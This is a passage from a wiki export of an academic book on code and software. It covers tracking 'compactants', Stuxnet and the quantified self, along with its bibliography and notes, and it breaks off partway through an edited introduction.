One of the most interesting aspects to these systems is that humans in many cases become the vectors that enable the data transfers. Whilst also becoming the vectors that carry the data that fuels the computational economy. Our movements between systems, carrying USB sticks and logging into email accounts and distant networks creates the channels through which data flows or an infection is spread. The ability of these viruses to take on some of the features of web bugs and learn our habits and preferences in real-time whilst secreting themselves within our computer systems raises important questions. However, users are actively downloading apps that advertise the fact that they collect this data and seem to genuinely find an existential relief or recognition in their movements being recorded and available for later playback or analysis. Web bugs in many ways are life streams. Albeit life streams that have not been authorized by the user whom they are monitoring. This collection of what we might call ''compactants'' are designed to ''passive-aggressively'' record data.[15] With the notion of ''compactants'' (computational actants) I want to particularly draw attention to this passive-aggressive feature of computational agents that are collecting information. Both in terms of their passive quality – under the surface, relatively benign and silent – but also the fact that they are aggressive in their hoarding of data – monitoring behavioural signals, streams of affectivity and so forth. The word ''compact'' also has useful overtones of having all the necessary components or functions neatly fitted into a small package, and compact as in conciseness in expression. The etymology from the Latin ''compact'' for closely put together, or joined together, also nearly expresses the sense of what web bugs and related technologies are. Compactants are also useful in terms of the notion of ''companion actants'' (see Harraway 2003).&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Interestingly, compactants are structured in such a way that they can be understood as having a dichotomous structure of data-collection/visualisation, each of which is a specific mode of operation. Naturally, due to the huge quantities of data that is often generated, the computational processing and aggregation is often offloaded to the ‘cloud’, or server computers designed specifically for the task and accessed via networks. Indeed, many viruses, for example, often seek to ‘call home’ to report their status, upload data, or offer the chance of being updated, perhaps to a more aggressive version of themselves or to correct bugs. &lt;br /&gt;
&lt;br /&gt;
We might also think about the addressee of these wider computational systems made up of arrays or networks of compactants, which in many cases is a future actor. Within the quantified-self movement there is an explicit recognition that the “future self” will be required to undo bad habits and behaviours of the present-self. That is, that there is an explicit normative context to a ''future'' self, who you, as the ''present'' self may be treating unfairly, immorally or without due regard to, what has been described as “future self continuity” (Tugend 2012). This inbuilt tendency toward the ''futural'' is a fascinating reflection of the internal temporal representation of time within computational systems, that is time-series structured streams of real-time data, often organised as lists. Therefore the past (as stored data), present (as current data collection, or processed archival data), and future (as both the ethical addressee of the system and potential provider of data and usage) are often deeply embedded in the code that runs these systems. In some cases the future also has an objective existence as a probabilistic projection, literally a ''code-object'', which is updated in real-time and which contains the major features of the future state represented as a model; computational weather prediction systems and climate change models are both examples of this. &lt;br /&gt;
&lt;br /&gt;
There are many examples of how attending to the code and software that structures many of the life, memory and biopolitical systems and industries of contemporary society could yield similarly revealing insights into both our usage of code and software, but also the structuring assumptions, conditions and affordances that are generated. Our use of computational models is growing, and our tendency is to confuse the screenic representation visualised by code/software with what we might call the real – not to mention our failure to appreciate the ways in which code’s mediation is co-constructive of, and deeply involved in, the stabilisation of everyday life today. Evenso, within institutional contexts, code/software has not fully been incorporated into the specific logics of these social systems, and in many ways undermines these structural and institutional forms. We must remain attentive to the fact that software engineering itself is a relatively recent discipline and its efforts at systematisation and rationalisation are piecemeal and incomplete, as the many hugely expensive software system failures attests. Of course, this code/software research is not easy, the techniques needed are still in their infancy, and whilst drawing on a wide range of scholarly work from the sciences, social sciences and the arts and humanities we are still developing our understanding. But this should give hope and direction to the critical theorists, both of the present looking to provide critique and counterfactuals, but also ''of'' the future, as code/software is a particularly rich site for intervention, contestation and the ''unbuilding'' of code/software systems.[16] &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Acknowledgements'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; I am very grateful to the ''Forskningsrådet'' (Research Council of Norway) for the ''Yggdrasil'' fellowship ref: 211106 which funded my sabbatical in Oslo in 2012. I would also like to thank Anders Fagerjord, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo, for the kind invitation to be based at the university. An earlier version of this chapter was presented at UnlikeUs in March 2012, at the University of Amsterdam, and I would like to thank Geert Lovink for the kind invitation to present this work. I am also grateful to have had the opportunity to present versions of the chapter in this book to: PhiSci seminar series, organised by Rani Lill Anjum, CauSci (Causation in Science) and the UMB School of Economics and Business; ''Institutt for medier og kommunikasjon'' (IMK) seminar series, invited by Espen Ytreberg, University of Oslo; Digital Humanities Workshop, organized by Caroline Bassett, University of Sussex; the Media Innovations Colloquium organized by Tanja Storsul, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo; and the Archive in Motion workshop, ''Nasjonal Bibliotek'' organised by Ina Blom, University of Oslo. Many thanks are also due to Trine for proofing the documents included in this living book. &lt;br /&gt;
&lt;br /&gt;
== '''Bibliography'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
60minutes (2012a) Fmr. CIA head calls Stuxnet virus &amp;quot;good idea&amp;quot;, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57388982/fmr-cia-head-calls-stuxnet-virus-good-idea/ &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; 60minutes (2012b) Stuxnet: Computer worm opens new era of warfare, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57390124/stuxnet-computer-worm-opens-new-era-of-warfare/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreams (n.d.) Activity Streams, accessed 04/03/2012, http://activitystrea.ms/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreamsWG (2011) JSON Activity Streams 1.0,Activity Streams Working Group, accessed 04/03/2012, http://activitystrea.ms/specs/json/1.0/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
AP (2012) Iran says Stuxnet virus infected 16,000 computers, ''Associated Press'', accessed 04/03/2012, http://www.foxnews.com/world/2012/02/18/iran-says-stuxnet-virus-infected-16000-computers/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Berry, D. M. (2011) ''The Philosophy of Software: Code and Mediation in the Digital Age'', London: Palgrave. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Baker, J. (2012) European Watchdog Pushes for Do Not Track Protocol, accessed 10/03/2012, http://www.pcworld.com/businesscenter/article/251373/european_watchdog_pushes_for_do_not_track_protocol.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
CBSNews (2010)Iran Confirms Stuxnet Worm Halted Centrifuges, ''CBSNews'', accessed 04/03/2012, http://www.cbsnews.com/stories/2010/11/29/world/main7100197.shtml &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cherry, S. (2010) How Stuxnet Is Rewriting the Cyberterrorism Playbook, ''IEEE Spectrum: Inside Technology'', accessed 04/03/2012, http://spectrum.ieee.org/podcast/telecom/security/how-stuxnet-is-rewriting-the-cyberterrorism-playbook &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cryptome (2010) Stuxnet Myrtus or MyRTUs?, accessed 04/03/2012, http://cryptome.org/0002/myrtus-v-myRTUs.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Deuze, M., Blank, P. and Speers, L. (2012) A Life Lived in Media, ''Digital Humanities Quarterly'', Winter 2012, Volume&amp;amp;nbsp;6&amp;amp;nbsp;Number&amp;amp;nbsp;1, accessed 29/02/2012, http://digitalhumanities.org/dhq/vol/6/1/000110/000110.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Dobias, J. (2010) Privacy Effects of Web Bugs Amplified by Web 2.0, in Fischer-Hübner, S., Duquenoy, P., Hansen, M., Leenes, R., and Zhang, G. (eds.) ''Privacy and Identity Management for Life'', London: Springer. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Economist (2012) Counting every moment, ''The Economist'', accessed 02/03/2012, http://www.economist.com/node/21548493 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
EFF (1999) The Web Bug FAQ, accessed 02/03/2012, http://w2.eff.org/Privacy/Marketing/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evans, S. (2012) Duqu Trojan used 'unknown' programming language: Kaspersky, CBR Software Malware, accessed 09/03/2012, http://malware.cbronline.com/news/duqu-trojan-used-unknown-programming-language-kaspersky-070312 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evers, J. (2006) How HP bugged e-mail, accessed 02/03/2012, http://news.cnet.com/How-HP-bugged-e-mail/2100-1029_3-6121048.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Eyal, N. (2012) How To Manufacture&amp;amp;nbsp;Desire, ''TechCrunch'',accessed 05/03/2012, http://techcrunch.com/2012/03/04/how-to-manufacture-desire/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Fried, I. (2006) Dunn grilled by Congress,accessed 02/03/2012, http://news.cnet.com/Dunn-grilled-by-Congress/2100-1014_3-6120625.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (1997) The Lifestreams Software Architecture, Ph.D. Dissertation, Yale University Department of Computer Science, May 1997, accessed 02/03/2012, http://www.cs.yale.edu/homes/freeman/dissertation/etf.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (2000) Welcome to the Yale Lifestreams homepage!, accessed 02/03/2012, http://cs-www.cs.yale.edu/homes/freeman/lifestreams.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Garber, M. (2012) Americans Love Google! Americans Hate Google!, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/03/americans-love-google-americans-hate-google/254253/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (1994. The cyber-road not taken. ''The Washington Post'', April 1994. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (2010) Time To Start Taking The Internet Seriously, ''The Edge'', accessed 02/03/2012, http://www.edge.org/3rd_culture/gelernter10/gelernter10_index.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2010) The Many Data Hats a Company can Wear, accessed 02/03/2012, http://purplebox.ghostery.com/?p=948639073 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2011) Ghostrank Planetary System, accessed 02/03/2012,&amp;amp;nbsp; http://purplebox.ghostery.com/?p=1016021670 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012a) About Ghostery, accessed 02/03/2012, http://www.ghostery.com/about) &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012b) About ChartBeat, accessed 02/03/2012, http://www.ghostery.com/apps/chartbeat &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gostev, A. (2012) Stuxnet/Duqu: The Evolution of Drivers, SecureList, accessed 02/03/2012, https://www.securelist.com/en/analysis/204792208/Stuxnet_Duqu_The_Evolution_of_Drivers &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gross, M. J. (2011) A Declaration of Cyber-War, ''Vanity Fair'', accessed 02/03/2012, http://www.vanityfair.com/culture/features/2011/04/stuxnet-201104 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Harraway, D. (2003) ''The Companion Species Manifesto: Dogs, People, and Significant Otherness'', Prickly Paradigm Press. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hayles, N. K. (2004) Print Is Flat, Code Is Deep: The Importance of Media-Specific Analysis, ''Poetics Today'', 25:1, pp 67-90. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hopkins, N. (2011) 'New Stuxnet' worm targets companies in Europe, ''The Guardian'', http://www.guardian.co.uk/technology/2011/oct/19/stuxnet-worm-europe-duqu &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Kruszelnicki, K. (2011) Stuxnet opens cracks in Iran nuclear program, accessed 02/03/2012, http://www.abc.net.au/science/articles/2011/10/26/3348123.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Langner, R. (2011) Ralph Langner: Cracking Stuxnet, a 21st-century cyberweapon, accessed 02/03/2012, http://www.youtube.com/watch?feature=player_embedded&amp;amp;amp;v=CS01Hmjv1pQ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Luma (2010) Display Advertising Technology Landscape, accessed 02/03/2012, http://www.lunapartners.com &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Madrigal, A. (2012) I'm Being Followed: How Google—and 104 Other Companies—Are Tracking Me on the Web, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/02/im-being-followed-how-google-and-104-other-companies-are-tracking-me-on-the-web/253758/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Markoff, J. and Sanger, D. S. (2010) In a Computer Worm, a Possible Biblical Clue, ''The New York Times'', accessed 04/03/2012, http://www.nytimes.com/2010/09/30/world/middleeast/30worm.html?_r=1 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Matrosov, A., Rodionov, E., Harley, D. and Malcho, J. (n.d.) Stuxnet Under the Microscope, accessed 04/03/2012, http://go.eset.com/us/resources/white-papers/Stuxnet_Under_the_Microscope.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mitcham, C. (1998) The Importance of Philosophy to Engineering, ''Teorema'', Vol. XVII/3, pp. 27-47. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mittal, S. (2010) User Privacy and the Evolution of Third-party Tracking Mechanisms on the World Wide Web, Thesis, accessed 04/03/2012, http://www.stanford.edu/~sonalm/Mittal_Thesis.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mmpc2 (2010) The Stuxnet Sting, accessed 04/03/2012, http://blogs.technet.com/b/mmpc/archive/2010/07/16/the-stuxnet-sting.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Peterson, D. G. (2012) Langner’s Stuxnet Deep Dive S4 Video, accessed 04/03/2012, http://www.digitalbond.com/2012/01/31/langners-stuxnet-deep-dive-s4-video/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Pew (2012) Search Engine Use 2012, accessed 09/03/2012, http://pewinternet.org/Reports/2012/Search-Engine-Use-2012/Summary-of-findings.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Rieland, R. (2012) So What Do We Do With All This Data?, _The Smithsonian_, accessed 04/03/2012, http://blogs.smithsonianmag.com/ideas/2012/01/so-what-do-we-do-with-all-this-data/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Sense (2012) Feel. Act. Make sense, accessed 04/03/2012, http://open.sen.se/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Tugend, A. (2012) Bad Habits? My Future Self Will Deal With That, accessed 04/03/2012, http://www.nytimes.com/2012/02/25/business/another-theory-on-why-bad-habits-are-hard-to-break-shortcuts.html?_r=3&amp;amp;amp;pagewanted=all &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
W3C (2012) Tracking Protection Working Group, accessed 14/03/2012, http://www.w3.org/2011/tracking-protection/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Wolfram, S. (2012) The Personal Analytics of My Life, accessed 09/03/2012, http://blog.stephenwolfram.com/2012/03/the-personal-analytics-of-my-life/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Yarrow, J. (2011) CHART OF THE DAY: Here's How Much A Unique Visitor Is Worth, ''Business Insider'', accessed 02/03/2012, http://www.businessinsider.com/chart-of-the-day-revenue-per-unique-visitor-2011-1 &lt;br /&gt;
&lt;br /&gt;
**&amp;amp;nbsp;**&lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2010) Blockbuster Worm Aimed for Infrastructure, But No Proof Iran Nukes Were Target, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/09/stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2011) Report Strengthens Suspicions That Stuxnet Sabotaged Iran’s Nuclear Plant, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/12/isis-report-on-stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== Notes  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[1] These include HTTP cookies and Locally Stored Objects (LSOs) and document object model storage (DOM Storage) &lt;br /&gt;
&lt;br /&gt;
[2] ‘Cookies are small pieces of text that servers can set and read from a client computer in order to register its “state.” They have strictly specified structures and can contain no more than 4 KB of data each. When a user navigates to a particular domain, the domain may call a script to set a cookie on the user’s machine. The browser will send this cookie in all subsequent communication between the client and the server until the cookie expires or is reset by the server’ (Mittal 2010: 10). &lt;br /&gt;
&lt;br /&gt;
[3] Ghostery describes itself on its help page: “Be a web detective. Ghostery is your window into the invisible web – tags, web bugs, pixels and beacons that are included on web pages in order to get an idea of your online behavior. Ghostery tracks the trackers and gives you a roll-call of the ad networks, behavioral data providers, web publishers, and other companies interested in your activity” (Ghostery 2012a). &lt;br /&gt;
&lt;br /&gt;
[4] For an example see, http://static.chartbeat.com/js/chartbeat.js &lt;br /&gt;
&lt;br /&gt;
[5] Also see examples at: (1) Chartbeat: http://static.chartbeat.com/js/chartbeat.js &amp;amp;nbsp;; (2) Google Analytics: http://www.google-analytics.com/ga.js &amp;amp;nbsp;; (3) Omniture: http://o.aolcdn.com/omniunih.js &amp;amp;nbsp;; (4) Advertising.com: http://o.aolcdn.com/ads/adsWrapper.js &lt;br /&gt;
&lt;br /&gt;
[6] A computer worm is technically similar in design to a virus and is therefore considered to be a sub-class of a virus. Indeed, worms spread from computer to computer, often across networks, but unlike a virus, a worm has the ability to transfer itself without requiring any human action. A worm is able to do this by taking advantage of the file or information transport features, such as the networking setup, on a computer, which it exploits to enable it to travel from computer to computer unaided. &lt;br /&gt;
&lt;br /&gt;
[7] One of the ways in which the Stuxnet attack target was identified was through a close reading of the computer code that was disassembled from the worm and the careful analysis of the interal data structures and finite state machine used to structure the attack. Ironically, this was then matched by Ralph Langner with photographs that has been uploaded to the website of the President of Iran, Mahmoud Ahmadinejad, and confirmed the importance of the cascade structure, centrifuge layout and the enriching process by careful analysis of the accidental photographing of background images on computers used by the president see [http://www.president.ir/en/9172 [n]](http://www.president.ir/en/9172) (see Peterson 2012) &lt;br /&gt;
&lt;br /&gt;
[8] The timestamp in the file ~wtr4141.tmp indicates that the date of compilation was on 03/02/2010 (Matrosov et al n.d.). Although there is suspicion that there may be three versions of the Stuxnet code in response to its discovery: “Most curious, there were two major variants of the worm. The earliest versions of it, which appear to have been released in the summer of 2009, were extremely sophisticated in some ways but fairly primitive in others, compared with the newer version, which seems to have first circulated in March 2010. A third variant, containing minor improvements, appeared in April. In Schouwenberg’s view, this may mean that the authors thought Stuxnet wasn’t moving fast enough, or had not hit its target, so they created a more aggressive delivery mechanism. The authors, he thinks, weighed the risk of discovery against the risk of a mission failure and chose the former” (Gross 2011). &lt;br /&gt;
&lt;br /&gt;
[9] Although there are some criticisms that this link may be spurious, for instance Cryptome (2010) argues: It may be that the &amp;quot;myrtus&amp;quot; string from the recovered Stuxnet file path &amp;quot;b:\myrtus\src\objfre_w2k_x86\i386\guava.pdb&amp;quot; stands for &amp;quot;My-RTUs&amp;quot;as in Remote Terminal Unit. &lt;br /&gt;
&lt;br /&gt;
[10] After having performed detailed analysis of the Duqu code, Kaspersky Labs stated that they** “**are 100% confident that the Duqu Framework was not programmed with Visual C++. It is possible that its authors used an in-house framework to generate intermediary C code, or they used another completely different programming language,&amp;quot; (Evans 2012) &lt;br /&gt;
&lt;br /&gt;
[11] See http://quantifiedself.com/ &lt;br /&gt;
&lt;br /&gt;
[12] Wolfram further writes: “It’s amazing how much it’s possible to figure out by analyzing the various kinds of data I’ve kept. And in fact, there are many additional kinds of data I haven’t even touched on in this post.&amp;amp;nbsp;I’ve also got years of curated medical test data (as well as my not-yet-very-useful complete genome), GPS location tracks, room-by-room motion sensor data, endless corporate records—and much much more…And as I think about it all, I suppose my greatest regret is that I did not start collecting more data earlier.&amp;amp;nbsp;I have some backups of my computer filesystems going back to 1980. And if I look at the 1.7 million files in my current filesystem, there’s a kind of archeology one can do, looking at files that haven’t been modified for a long time (the earliest is dated June 29, 1980)” (Wolfram 2012). &lt;br /&gt;
&lt;br /&gt;
[13] Some examples of visualization software for this kind of life-streaming quantification and visualization are shown on these pages from the Quantified Self website: http://quantifiedself.com/2011/03/personal-data-visualization/ , http://quantifiedself.com/2010/05/jaw-dropping-infographics-for/ , http://quantifiedself.com/2010/05/the-visualization-zoo/), http://quantifiedself.com/2009/09/visualization-inspiration/ &lt;br /&gt;
&lt;br /&gt;
[14] See http://open.sen.se/ for a particularly good example of this: “Make your data history meaningful. Privately store your flows of information and use rich visualizations and mashup tools to understand what's going on” (Sense 2012). &lt;br /&gt;
&lt;br /&gt;
[15] Computational actants, drawing the notion of actant from actor-network theory. I also like the association with companion actants, similar in idea to companion species. &lt;br /&gt;
&lt;br /&gt;
[16] Here I tentatively raise the suggestion that a future critical theory of code and software is committed to ''un-building'', ''dis-assembling'', and ''de-formation'' of existing code/software systems, together with a necessary intervention in terms of a positive moment in the formation and composition of future and alternative systems.&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4671</id>
		<title>Life in Code and Software/Introduction</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4671"/>
		<updated>2012-03-19T10:46:50Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[http://www.livingbooksaboutlife.org/books/Life_in_Code_and_Software/ Back to the book] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This book explores the relationship between living, code and software. Technologies of code and software increasingly make up an important part of our urban environment. Indeed, their reach stretches to even quite remote areas of the world. ''Life in Code and Software'' introduces and explores the way in which code and software are becoming the conditions of possibility for human living, crucially forming a computational ecology that we inhabit. As such we need to take account of this new computational envornment and think about how today we live in a highly mediated, code-based world. [Eds: Is there a slippage here from a situation where code and software are 'important', to one in which they form the actual basis of our world, constituting the possibility of human life? Does something need to be said here about the extent to which code and software can be privileged in this respect? For example, why can they be said to constitute the conditions for human living over and above any of the other possible candidates for this role: air, the economy, evolution, the environment and so on?]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Certainly, computer code and software are not merely mechanisms; they represent an extremely rich form of media. They differ from previous instantiations of media&amp;amp;nbsp; in that they are highly processual. They can also have agency delegated to them, which they can then prescribe back onto other actors, but which also remains within the purview of humans to seek to understand. As Kitchin argues:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;across a diverse set of everyday tasks, domestic chores, work, shopping, travelling, communicating, governing, and policing, software makes a difference to how social, spatial, and economic life takes place. Such is software's capacities and growing pervasiveness that some analysts predict that we are entering a new phase of ‘everyware’ (Greenfield, 2006); that is, computational power will be distributed and available at any point on the planet (Kitchin, 2011: 945).&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This deeply interactive characteristic of code and software makes computational media highly plastic for use in everyday life, and as such it has inevitably [Eds: is its penetration really 'inevitable'?] penetrated more and more into the lifeworld. This has created, and continues to create, specific tensions in relation to old media forms [Eds: should an example be provided of such a tension?], as well as problems for managing and spectacularising the relations of the public to the entertainment industry and politics. This is something that relates to the interests of the previous century’s critical theorists, particularly their concern with the liquidation of individuality and the homogenization of culture. Nonetheless, there is also held to be a radical, if not revolutionary kernel within the softwarization project. This [Eds: this is the fourth sentence in this paragraph to begin with 'this'] is a result of the relative affordance code/software appears to provide for autonomous individuals within networks of association to share information and communicate. Indeed, as Deuze ''et al ''have argued:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Considering the current opportunity a media life gives people to create multiple versions of themselves and others, and to endlessly redact themselves (as someone does with his/her profile on an online dating site in order to produce better matches), we now have a entered a time where… we can in fact see ourselves live, become cognizant about how our lifeworld is 'a world of artifice, of bending, adapting, of fiction, vanity, a world that has meaning and value only for the man who is its deviser' [Pirandello 1990,&amp;amp;nbsp;39]. But this is not an atomized, fragmented, and depressing world, or it does not have to be such a world (Deuze, Blank, and Speers, 2012).&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; I want to understand the ecology in computational ecology here as a broad concept related to the environmental habitus of both human and non-human actors. My aim in doing so is to explore changes that are made possible by the installation of code/software via computational devices, streams, clouds, or networks. This is what Mitcham calls a ‘new ecology of artifice’ (1998: 43). The proliferation of contrivances that are computationally based is truly breathtaking - each year we are provided with fresh statistics that demonstrate just how profound the new computational world is. [Eds: should some examples of such statistics be provided?] These computationally based devices, of course, are not static, nor are they mute, and their interconnections, communications, operation, effects and usage remain to be properly studied. It is a task that is made all the more difficult: both by the staggering rate of change, thanks to the underlying hardware technologies, which are becoming ever smaller, more compact, more powerful and less power-hungry; and by the increasing complexity, power, range and intelligence of the software that powers it. &lt;br /&gt;
&lt;br /&gt;
They [Eds: what does this 'they' refer to? Can it be clarified?] also enable the assemblage of the new social ontologies and the corresponding social epistemologies that we have increasingly come to take for granted in computational society, including Wikipedia, Facebook, and Twitter. The extent to which computational devices, and the computational principles on which they are based and from which they draw their power, have permeated the way we use and develop knowledges in everyday life is simply breathtaking [Eds: is this not repeating the 'breathtaking' claim of the previous paragraph?], if we had not already discounted and backgrounded its importance. The ability to call up information instantly from a mobile device, combine it with others, subject it to debate and critique through real-time social networks, and then edit, post and distribute it worldwide would be incredible if it hadn’t become so mundane. &lt;br /&gt;
&lt;br /&gt;
Today it should hardly come as a surprise that code/software lies as a mediator between ourselves and our corporeal experiences [Eds: Above the claim was made that code/software are the conditions of possibility of human life. How, then, can they mediate between us and our experiences if they are what makes 'us' possible? Do they constitute us and our world; do they mediate between us and the world; or do they do both? Does all this need clarifying?], disconnecting the physical world from a direct coupling with our physicality, whilst managing a looser softwarized transmission system. Called ‘fly-by-wire’ in aircraft design, in reality fly-by-wire is the condition of the computational environment we increasingly experience, and I elsewhere term ''computationality'' (Berry, 2011). This is a highly mediated existence and has been a growing feature of the (post) modern world. Whilst many objects remain firmly material and within our grasp, it is easy to see how a more softwarized simulacra lies just beyond the horizon. Not that software isn’t material, of course. Certainly, it is embedded in physical objects and the physical environment and requires a material carrier to function at all. Nonetheless, the materiality of software is without a doubt ''differently'' material, more ''tenuously'' material, almost less ''materially material''. [Eds: less material than what? Does this need to be explained?] This is partly, it has to be said, due to software’s increasing tendency to hide its depths behind glass rectangular squares which yield only to certain prescribed forms of touch-based interfaces. Here I am thinking both of physical keyboards and trackpads, as much as haptic touch interfaces, like those found in the iPad and other tablet computers. Another way of putting this, as N. Katherine Hayles (2004) has accurately observed, is that print is flat and code is 